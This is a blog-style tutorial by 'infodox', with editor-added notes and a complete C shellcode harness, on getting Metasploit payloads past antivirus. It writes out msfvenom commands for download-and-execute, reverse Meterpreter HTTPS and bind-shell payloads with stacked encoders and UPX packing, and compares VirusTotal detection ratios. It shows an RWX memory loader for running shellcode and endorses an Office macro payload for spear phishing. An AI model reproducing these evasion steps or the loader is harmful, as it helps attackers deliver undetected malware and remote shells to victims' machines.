- Using shellcode execution as a possible antivirus bypass technique.
- Ok, first off, we need to create our malicious "shellcode payload". I have a few examples below of possible payloads we could be using. One caveat on the encoder chains in these commands: msfvenom takes a single -e/-i pair, and when the options are repeated on one command line only the last pair given is honoured (here x86/jmp_call_additive with 5 iterations), so to genuinely stack encoders you have to run them as separate passes, emitting -f raw and feeding that into the next run (msfvenom -p - reads a custom payload from stdin, the same way msfpayload | msfencode used to be chained).
- 1. Download and execute.
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- 2. Reverse Meterpreter HTTPS shell
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- 3. Standard Bind Shell
- msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".
- Step One: Download and Execute Payload.
- Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe
- So, we have our binary, and we upload it to the VirusTotal scanning service to see how many detections we get. Bear in mind that VirusTotal shares uploaded samples with the AV vendors, so anything uploaded here should be treated as burned for a real engagement.
- Filename: dlexec.exe
- Filesize: 72.1 KB
- MD5 Hash: aeace18d84af11640a219b2b557ee8ee
- Packing: No UPX used.
- Detections: 32/42
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/
- Next up we UPX it with this command: upx -9 dlexec.exe
- Filesize: 47.0KB
- MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
- Detections: 27/43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/
- Now, we re-do the whole thing with the shellcode-execution method, which should be detected a LOT less: most of the detections above are signatures on the stock Metasploit exe template rather than on the encoded payload bytes, and a small custom harness does not carry that template.
- First, we create our shellcode:
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- Now we pop the resulting buf[] into our shellcode harness (meta.c) and cross-compile it for Windows with MinGW:
- i586-mingw32msvc-gcc meta.c -o dlcrypt.exe
- Filename: dlcrypt.exe
- Filesize: 20.1KB
- MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
- Packing: No UPX used.
- Detections: 14 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/
- As you can see, it is a far smaller file with far fewer detections. Let's UPX it and see what happens next...
- Filename: dlcrypt.exe
- Filesize: 14.1 KB
- MD5 Hash: 03d634dde3d1e573d99776009e8567f5
- Packing: UPX used.
- Detections: 18 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/
- It would appear UPX is counterproductive to bypassing AV here (well-known packers usually are: engines recognise the UPX stub and unpack it statically, and a tiny UPX-packed binary is itself a heuristic red flag), so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.
- Ok. Reverse HTTPS payload time!
- Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse HTTPS meterpreter payload.
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe
- So, we have our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...
- Filename: payload.exe
- Filesize: 72.1 KB
- MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
- Packing: No UPX used.
- Detections: 30 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/
- Next up, we UPX it:
- Filename: payload.exe
- Filesize: 47.0 KB
- MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
- Packing: UPX used.
- Detections: 26 / 42
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/
- As you can see, UPX had a positive effect this time. Then I noticed something bloody amazing in the MSFVENOM manual:
- The exe-small output format.
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe
- No encoding was used this time, by the way.
- Filename: payload.exe
- Filesize: 4.5 KB
- MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
- Packing: None
- Detections: 13 / 43
- Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/
- So, let's add some encoding and see what happens...
- ##
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe
- https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/
- More detected? WTF? Fine, let's move on... (This is less surprising than it looks: the shikata_ga_nai decoder stub and the other encoder stubs are themselves well signatured, so stacking encoders adds recognisable code to the binary rather than removing it, and the encoding only hides the payload bytes, not the template they are wrapped in.)
- ##
- Now I started looking into alternative output formats, and came up with this:
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe
- Filename: vba.exe
- Filesize: 290.2 KB
- MD5 Hash: aedde86916de88b856b22c6e384901bb
- Packing: None
- Detections: 0 / 42
- Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/
- This is an MS Office macro payload: open the file in a text editor and follow the instructions at the top.
- Final Notes: The MS Office macro payload is likely the most promising of the lot, as it can be directly embedded into an MS Word document for spear phishing attacks and appears to bypass AV outright. One caveat on that 0/42, though: the vba-exe output is VBA text with the Windows exe embedded as data, and when the macro runs it drops that exe to disk and executes it, at which point the dropped file is the same Metasploit-template exe scored above. The scan shows that engines do not flag the text container at upload time, not that the payload goes undetected once it runs on the host.
- Now for ONE LAST TRY: Objdump Pwnage.
- root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
- root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
- root@shinigami:/tmp# chmod +x xxd-shellcode.sh
- root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
- ### Here is where you pop the contents of sc.txt into the shellcode test harness as before. Note what sc.txt actually is, though: xxd-shellcode.sh just dumps every byte of micro.exe, PE headers included, as \x escapes. A harness that jumps to the start of that buffer lands in the MZ/DOS header, which is not position-independent code, so this build measures how engines score a PE image embedded as data inside a small binary, not a working loader. ###
- root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe
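The paste never includes the harness itself (meta.c in step one, sc.c here), so below is one of that shape, added by the editor and not infodox's own file. It covers both "pop it into the harness" steps: decode_c_escapes() reads msfvenom -f c style text (the buf[] declaration, or the \x string in sc.txt) into raw bytes, map_exec() copies them into RWX memory (VirtualAlloc on Windows, mmap elsewhere), and run_shellcode() jumps to them. The embedded sample text is constructed for the example, a six-byte x86 stub (mov eax, 42; ret) rather than a real payload, so the harness can be smoke-tested without a listener; paste a real buf[] in its place and build with i586-mingw32msvc-gcc as in the post. Feeding it the raw bytes of a whole PE, as sc.txt does, decodes and maps fine but will not run correctly, because the PE header is not code.

```c
/* Shellcode test harness: added example, not the meta.c / sc.c from the paste.
 * Build for Windows as in the post:  i586-mingw32msvc-gcc harness.c -o harness.exe
 * Build natively for a smoke test:   gcc harness.c -o harness
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Value of one hex digit, or -1 if the character is not a hex digit. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode msfvenom -f c style text ("\xfc\xe8...", with or without the
 * 'unsigned char buf[] =' wrapper, quotes, newlines and the trailing ';')
 * into raw bytes. Everything that is not a \xNN escape is skipped.
 * Returns the byte count, or 0 if an escape is malformed or dst is too small. */
size_t decode_c_escapes(const char *src, unsigned char *dst, size_t cap) {
    size_t n = 0;
    for (const char *p = src; *p; ) {
        if (p[0] == '\\' && p[1] == 'x') {
            int hi = hexval((unsigned char)p[2]);
            if (hi < 0) return 0;              /* also catches a truncated escape */
            int lo = hexval((unsigned char)p[3]);
            if (lo < 0 || n >= cap) return 0;
            dst[n++] = (unsigned char)((hi << 4) | lo);
            p += 4;
        } else {
            p++;                               /* quotes, whitespace, declaration */
        }
    }
    return n;
}

/* Copy the shellcode into freshly allocated RWX memory. NULL on failure. */
void *map_exec(const unsigned char *code, size_t len) {
#ifdef _WIN32
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return NULL;
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
#endif
    memcpy(mem, code, len);
    return mem;
}

/* Transfer control to the mapped bytes. A real msfvenom payload never
 * returns; the int is only meaningful for a stub that ends in 'ret'. */
int run_shellcode(void *mem) {
    int (*entry)(void) = (int (*)(void))mem;
    return entry();
}

/* Constructed sample in the exact layout msfvenom -f c prints. It is NOT a
 * payload: on x86 / x86-64 the bytes are 'mov eax, 42 ; ret'. */
static const char sample_buf_text[] =
    "unsigned char buf[] = \n"
    "\"\\xb8\\x2a\\x00\\x00\\x00\"\n"
    "\"\\xc3\";\n";

/* Decode and map the sample without executing it; returns the byte count
 * (6) when the mapped copy matches the decoded bytes, 0 otherwise. */
size_t harness_selftest(void) {
    unsigned char code[64];
    size_t len = decode_c_escapes(sample_buf_text, code, sizeof code);
    if (len == 0) return 0;
    void *mem = map_exec(code, len);
    if (mem == NULL || memcmp(mem, code, len) != 0) return 0;
    return len;
}

int main(void) {
    unsigned char code[65536];                 /* room for any msfvenom stager */
    size_t len = decode_c_escapes(sample_buf_text, code, sizeof code);
    if (len == 0) { fputs("malformed shellcode text\n", stderr); return 1; }
    void *mem = map_exec(code, len);
    if (mem == NULL) { fputs("could not map RWX memory\n", stderr); return 1; }
    printf("decoded %lu bytes, jumping in...\n", (unsigned long)len);
    printf("stub returned %d\n", run_shellcode(mem));
    return 0;
}
```

The one RWX allocation plus a bare function-pointer call is the whole trick the post relies on: nothing about the harness is Metasploit-specific, which is why the template signatures stop matching, while the payload bytes and their behaviour are unchanged and remain fair game for memory scanners and behavioural detection.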
- So now we scan our new binary and see how well it "bypasses". We can take this further, by the way...
- MD5: 7642f0914ebbe62ddc8d64ffe7d52783
- File size: 24.1 KB ( 24650 bytes )
- File name: helloshell.exe
- File type: Win32 EXE
- Detection ratio: 10 / 43
- Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/
- Next: We UPX it...
- MD5: 963253a72210eb8bd7155137713112ba
- File size: 16.6 KB ( 16970 bytes )
- File name: helloshell.exe
- File type: Win32 EXE
- Detection ratio: 10 / 41
- Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/
- So then I take this variant, pretend it is micro.exe, and re-encode it...
- Result?
- PRE UPX:
- MD5: a34d634236388762de0801acdd587cc9
- File size: 36.1 KB ( 36938 bytes )
- File name: helloshell2.exe
- File type: Win32 EXE
- Detection ratio: 5 / 43
- Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/
- POST UPX:
- Detections: 10 / 42
- Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/
- root@shinigami:/tmp# exit
- I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shikata_ga_nai) may help. I will investigate this later.
- ~infodox